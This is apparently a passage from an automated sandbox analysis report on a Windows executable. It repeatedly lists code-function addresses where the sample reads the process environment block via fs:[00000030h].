          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01848402 mov eax, dword ptr fs:[00000030h]0_2_01848402
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01848402 mov eax, dword ptr fs:[00000030h]0_2_01848402
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01848402 mov eax, dword ptr fs:[00000030h]0_2_01848402
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0180E420 mov eax, dword ptr fs:[00000030h]0_2_0180E420
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0180E420 mov eax, dword ptr fs:[00000030h]0_2_0180E420
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0180E420 mov eax, dword ptr fs:[00000030h]0_2_0180E420
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0180C427 mov eax, dword ptr fs:[00000030h]0_2_0180C427
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01896420 mov eax, dword ptr fs:[00000030h]0_2_01896420
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01896420 mov eax, dword ptr fs:[00000030h]0_2_01896420
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01896420 mov eax, dword ptr fs:[00000030h]0_2_01896420
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01896420 mov eax, dword ptr fs:[00000030h]0_2_01896420
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01896420 mov eax, dword ptr fs:[00000030h]0_2_01896420
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01896420 mov eax, dword ptr fs:[00000030h]0_2_01896420
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01896420 mov eax, dword ptr fs:[00000030h]0_2_01896420
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0184A430 mov eax, dword ptr fs:[00000030h]0_2_0184A430
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0184E443 mov eax, dword ptr fs:[00000030h]0_2_0184E443
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0184E443 mov eax, dword ptr fs:[00000030h]0_2_0184E443
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0184E443 mov eax, dword ptr fs:[00000030h]0_2_0184E443
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0184E443 mov eax, dword ptr fs:[00000030h]0_2_0184E443
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0184E443 mov eax, dword ptr fs:[00000030h]0_2_0184E443
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0184E443 mov eax, dword ptr fs:[00000030h]0_2_0184E443
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0184E443 mov eax, dword ptr fs:[00000030h]0_2_0184E443
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0184E443 mov eax, dword ptr fs:[00000030h]0_2_0184E443
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0183245A mov eax, dword ptr fs:[00000030h]0_2_0183245A
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018CA456 mov eax, dword ptr fs:[00000030h]0_2_018CA456
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0180645D mov eax, dword ptr fs:[00000030h]0_2_0180645D
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0189C460 mov ecx, dword ptr fs:[00000030h]0_2_0189C460
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0183A470 mov eax, dword ptr fs:[00000030h]0_2_0183A470
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0183A470 mov eax, dword ptr fs:[00000030h]0_2_0183A470
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0183A470 mov eax, dword ptr fs:[00000030h]0_2_0183A470
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018B678E mov eax, dword ptr fs:[00000030h]0_2_018B678E
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018C47A0 mov eax, dword ptr fs:[00000030h]0_2_018C47A0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018107AF mov eax, dword ptr fs:[00000030h]0_2_018107AF
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0181C7C0 mov eax, dword ptr fs:[00000030h]0_2_0181C7C0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018907C3 mov eax, dword ptr fs:[00000030h]0_2_018907C3
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0189E7E1 mov eax, dword ptr fs:[00000030h]0_2_0189E7E1
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018327ED mov eax, dword ptr fs:[00000030h]0_2_018327ED
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018327ED mov eax, dword ptr fs:[00000030h]0_2_018327ED
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018327ED mov eax, dword ptr fs:[00000030h]0_2_018327ED
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018147FB mov eax, dword ptr fs:[00000030h]0_2_018147FB
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018147FB mov eax, dword ptr fs:[00000030h]0_2_018147FB
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0184C700 mov eax, dword ptr fs:[00000030h]0_2_0184C700
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01810710 mov eax, dword ptr fs:[00000030h]0_2_01810710
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01840710 mov eax, dword ptr fs:[00000030h]0_2_01840710
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0184C720 mov eax, dword ptr fs:[00000030h]0_2_0184C720
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0184C720 mov eax, dword ptr fs:[00000030h]0_2_0184C720
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0184273C mov eax, dword ptr fs:[00000030h]0_2_0184273C
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0184273C mov ecx, dword ptr fs:[00000030h]0_2_0184273C
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0184273C mov eax, dword ptr fs:[00000030h]0_2_0184273C
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0188C730 mov eax, dword ptr fs:[00000030h]0_2_0188C730
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0184674D mov esi, dword ptr fs:[00000030h]0_2_0184674D
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0184674D mov eax, dword ptr fs:[00000030h]0_2_0184674D
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0184674D mov eax, dword ptr fs:[00000030h]0_2_0184674D
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01810750 mov eax, dword ptr fs:[00000030h]0_2_01810750
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0189E75D mov eax, dword ptr fs:[00000030h]0_2_0189E75D
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01852750 mov eax, dword ptr fs:[00000030h]0_2_01852750
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01852750 mov eax, dword ptr fs:[00000030h]0_2_01852750
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01894755 mov eax, dword ptr fs:[00000030h]0_2_01894755
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01818770 mov eax, dword ptr fs:[00000030h]0_2_01818770
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01820770 mov eax, dword ptr fs:[00000030h]0_2_01820770
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01820770 mov eax, dword ptr fs:[00000030h]0_2_01820770
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01820770 mov eax, dword ptr fs:[00000030h]0_2_01820770
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01820770 mov eax, dword ptr fs:[00000030h]0_2_01820770
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01820770 mov eax, dword ptr fs:[00000030h]0_2_01820770
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01820770 mov eax, dword ptr fs:[00000030h]0_2_01820770
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01820770 mov eax, dword ptr fs:[00000030h]0_2_01820770
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01820770 mov eax, dword ptr fs:[00000030h]0_2_01820770
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01820770 mov eax, dword ptr fs:[00000030h]0_2_01820770
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01820770 mov eax, dword ptr fs:[00000030h]0_2_01820770
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01820770 mov eax, dword ptr fs:[00000030h]0_2_01820770
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01820770 mov eax, dword ptr fs:[00000030h]0_2_01820770
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01814690 mov eax, dword ptr fs:[00000030h]0_2_01814690
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01814690 mov eax, dword ptr fs:[00000030h]0_2_01814690
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0184C6A6 mov eax, dword ptr fs:[00000030h]0_2_0184C6A6
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018466B0 mov eax, dword ptr fs:[00000030h]0_2_018466B0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0184A6C7 mov ebx, dword ptr fs:[00000030h]0_2_0184A6C7
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0184A6C7 mov eax, dword ptr fs:[00000030h]0_2_0184A6C7
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018906F1 mov eax, dword ptr fs:[00000030h]0_2_018906F1
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018906F1 mov eax, dword ptr fs:[00000030h]0_2_018906F1
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0188E6F2 mov eax, dword ptr fs:[00000030h]0_2_0188E6F2
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0188E6F2 mov eax, dword ptr fs:[00000030h]0_2_0188E6F2
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0188E6F2 mov eax, dword ptr fs:[00000030h]0_2_0188E6F2
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0188E6F2 mov eax, dword ptr fs:[00000030h]0_2_0188E6F2
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0188E609 mov eax, dword ptr fs:[00000030h]0_2_0188E609
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0182260B mov eax, dword ptr fs:[00000030h]0_2_0182260B
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0182260B mov eax, dword ptr fs:[00000030h]0_2_0182260B
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0182260B mov eax, dword ptr fs:[00000030h]0_2_0182260B
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0182260B mov eax, dword ptr fs:[00000030h]0_2_0182260B
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0182260B mov eax, dword ptr fs:[00000030h]0_2_0182260B
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0182260B mov eax, dword ptr fs:[00000030h]0_2_0182260B
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0182260B mov eax, dword ptr fs:[00000030h]0_2_0182260B
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01852619 mov eax, dword ptr fs:[00000030h]0_2_01852619
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01846620 mov eax, dword ptr fs:[00000030h]0_2_01846620
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01848620 mov eax, dword ptr fs:[00000030h]0_2_01848620
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0182E627 mov eax, dword ptr fs:[00000030h]0_2_0182E627
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0181262C mov eax, dword ptr fs:[00000030h]0_2_0181262C
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0182C640 mov eax, dword ptr fs:[00000030h]0_2_0182C640
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018D866E mov eax, dword ptr fs:[00000030h]0_2_018D866E
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018D866E mov eax, dword ptr fs:[00000030h]0_2_018D866E
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0184A660 mov eax, dword ptr fs:[00000030h]0_2_0184A660
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0184A660 mov eax, dword ptr fs:[00000030h]0_2_0184A660
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01842674 mov eax, dword ptr fs:[00000030h]0_2_01842674
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018229A0 mov eax, dword ptr fs:[00000030h]0_2_018229A0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018229A0 mov eax, dword ptr fs:[00000030h]0_2_018229A0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018229A0 mov eax, dword ptr fs:[00000030h]0_2_018229A0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018229A0 mov eax, dword ptr fs:[00000030h]0_2_018229A0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018229A0 mov eax, dword ptr fs:[00000030h]0_2_018229A0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018229A0 mov eax, dword ptr fs:[00000030h]0_2_018229A0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018229A0 mov eax, dword ptr fs:[00000030h]0_2_018229A0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018229A0 mov eax, dword ptr fs:[00000030h]0_2_018229A0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018229A0 mov eax, dword ptr fs:[00000030h]0_2_018229A0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018229A0 mov eax, dword ptr fs:[00000030h]0_2_018229A0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018229A0 mov eax, dword ptr fs:[00000030h]0_2_018229A0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018229A0 mov eax, dword ptr fs:[00000030h]0_2_018229A0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018229A0 mov eax, dword ptr fs:[00000030h]0_2_018229A0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018109AD mov eax, dword ptr fs:[00000030h]0_2_018109AD
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018109AD mov eax, dword ptr fs:[00000030h]0_2_018109AD
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018989B3 mov esi, dword ptr fs:[00000030h]0_2_018989B3
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018989B3 mov eax, dword ptr fs:[00000030h]0_2_018989B3
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018989B3 mov eax, dword ptr fs:[00000030h]0_2_018989B3
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018A69C0 mov eax, dword ptr fs:[00000030h]0_2_018A69C0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0181A9D0 mov eax, dword ptr fs:[00000030h]0_2_0181A9D0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0181A9D0 mov eax, dword ptr fs:[00000030h]0_2_0181A9D0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0181A9D0 mov eax, dword ptr fs:[00000030h]0_2_0181A9D0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0181A9D0 mov eax, dword ptr fs:[00000030h]0_2_0181A9D0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0181A9D0 mov eax, dword ptr fs:[00000030h]0_2_0181A9D0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0181A9D0 mov eax, dword ptr fs:[00000030h]0_2_0181A9D0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018449D0 mov eax, dword ptr fs:[00000030h]0_2_018449D0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018DA9D3 mov eax, dword ptr fs:[00000030h]0_2_018DA9D3
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0189E9E0 mov eax, dword ptr fs:[00000030h]0_2_0189E9E0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018429F9 mov eax, dword ptr fs:[00000030h]0_2_018429F9
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018429F9 mov eax, dword ptr fs:[00000030h]0_2_018429F9
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0188E908 mov eax, dword ptr fs:[00000030h]0_2_0188E908
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0188E908 mov eax, dword ptr fs:[00000030h]0_2_0188E908
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01808918 mov eax, dword ptr fs:[00000030h]0_2_01808918
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01808918 mov eax, dword ptr fs:[00000030h]0_2_01808918
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0189C912 mov eax, dword ptr fs:[00000030h]0_2_0189C912
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018A892B mov eax, dword ptr fs:[00000030h]0_2_018A892B
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0189892A mov eax, dword ptr fs:[00000030h]0_2_0189892A
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018E4940 mov eax, dword ptr fs:[00000030h]0_2_018E4940
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01890946 mov eax, dword ptr fs:[00000030h]0_2_01890946
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01836962 mov eax, dword ptr fs:[00000030h]0_2_01836962
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01836962 mov eax, dword ptr fs:[00000030h]0_2_01836962
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01836962 mov eax, dword ptr fs:[00000030h]0_2_01836962
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0185096E mov eax, dword ptr fs:[00000030h]0_2_0185096E
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0185096E mov edx, dword ptr fs:[00000030h]0_2_0185096E
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0185096E mov eax, dword ptr fs:[00000030h]0_2_0185096E
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018B4978 mov eax, dword ptr fs:[00000030h]0_2_018B4978
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018B4978 mov eax, dword ptr fs:[00000030h]0_2_018B4978
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0189C97C mov eax, dword ptr fs:[00000030h]0_2_0189C97C
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01810887 mov eax, dword ptr fs:[00000030h]0_2_01810887
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0189C89D mov eax, dword ptr fs:[00000030h]0_2_0189C89D
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0183E8C0 mov eax, dword ptr fs:[00000030h]0_2_0183E8C0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018E08C0 mov eax, dword ptr fs:[00000030h]0_2_018E08C0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018DA8E4 mov eax, dword ptr fs:[00000030h]0_2_018DA8E4
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0184C8F9 mov eax, dword ptr fs:[00000030h]0_2_0184C8F9
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0184C8F9 mov eax, dword ptr fs:[00000030h]0_2_0184C8F9
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0189C810 mov eax, dword ptr fs:[00000030h]0_2_0189C810
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018B483A mov eax, dword ptr fs:[00000030h]0_2_018B483A
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018B483A mov eax, dword ptr fs:[00000030h]0_2_018B483A
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0184A830 mov eax, dword ptr fs:[00000030h]0_2_0184A830
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01832835 mov eax, dword ptr fs:[00000030h]0_2_01832835
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01832835 mov eax, dword ptr fs:[00000030h]0_2_01832835
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01832835 mov eax, dword ptr fs:[00000030h]0_2_01832835
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01832835 mov ecx, dword ptr fs:[00000030h]0_2_01832835
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01832835 mov eax, dword ptr fs:[00000030h]0_2_01832835
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01832835 mov eax, dword ptr fs:[00000030h]0_2_01832835
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01822840 mov ecx, dword ptr fs:[00000030h]0_2_01822840
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01840854 mov eax, dword ptr fs:[00000030h]0_2_01840854
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01814859 mov eax, dword ptr fs:[00000030h]0_2_01814859
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01814859 mov eax, dword ptr fs:[00000030h]0_2_01814859
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018A6870 mov eax, dword ptr fs:[00000030h]0_2_018A6870
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018A6870 mov eax, dword ptr fs:[00000030h]0_2_018A6870
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0189E872 mov eax, dword ptr fs:[00000030h]0_2_0189E872
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0189E872 mov eax, dword ptr fs:[00000030h]0_2_0189E872
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01820BBE mov eax, dword ptr fs:[00000030h]0_2_01820BBE
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01820BBE mov eax, dword ptr fs:[00000030h]0_2_01820BBE
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018C4BB0 mov eax, dword ptr fs:[00000030h]0_2_018C4BB0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018C4BB0 mov eax, dword ptr fs:[00000030h]0_2_018C4BB0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01830BCB mov eax, dword ptr fs:[00000030h]0_2_01830BCB
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01830BCB mov eax, dword ptr fs:[00000030h]0_2_01830BCB
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01830BCB mov eax, dword ptr fs:[00000030h]0_2_01830BCB
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01810BCD mov eax, dword ptr fs:[00000030h]0_2_01810BCD
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01810BCD mov eax, dword ptr fs:[00000030h]0_2_01810BCD
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01810BCD mov eax, dword ptr fs:[00000030h]0_2_01810BCD
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018BEBD0 mov eax, dword ptr fs:[00000030h]0_2_018BEBD0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01818BF0 mov eax, dword ptr fs:[00000030h]0_2_01818BF0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01818BF0 mov eax, dword ptr fs:[00000030h]0_2_01818BF0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01818BF0 mov eax, dword ptr fs:[00000030h]0_2_01818BF0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0189CBF0 mov eax, dword ptr fs:[00000030h]0_2_0189CBF0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0183EBFC mov eax, dword ptr fs:[00000030h]0_2_0183EBFC
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018E4B00 mov eax, dword ptr fs:[00000030h]0_2_018E4B00
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0188EB1D mov eax, dword ptr fs:[00000030h]0_2_0188EB1D
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0188EB1D mov eax, dword ptr fs:[00000030h]0_2_0188EB1D
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0188EB1D mov eax, dword ptr fs:[00000030h]0_2_0188EB1D
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0188EB1D mov eax, dword ptr fs:[00000030h]0_2_0188EB1D
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0188EB1D mov eax, dword ptr fs:[00000030h]0_2_0188EB1D
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0188EB1D mov eax, dword ptr fs:[00000030h]0_2_0188EB1D
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0188EB1D mov eax, dword ptr fs:[00000030h]0_2_0188EB1D
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0188EB1D mov eax, dword ptr fs:[00000030h]0_2_0188EB1D
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0188EB1D mov eax, dword ptr fs:[00000030h]0_2_0188EB1D
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0183EB20 mov eax, dword ptr fs:[00000030h]0_2_0183EB20
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0183EB20 mov eax, dword ptr fs:[00000030h]0_2_0183EB20
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018D8B28 mov eax, dword ptr fs:[00000030h]0_2_018D8B28
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018D8B28 mov eax, dword ptr fs:[00000030h]0_2_018D8B28
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018C4B4B mov eax, dword ptr fs:[00000030h]0_2_018C4B4B
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018C4B4B mov eax, dword ptr fs:[00000030h]0_2_018C4B4B
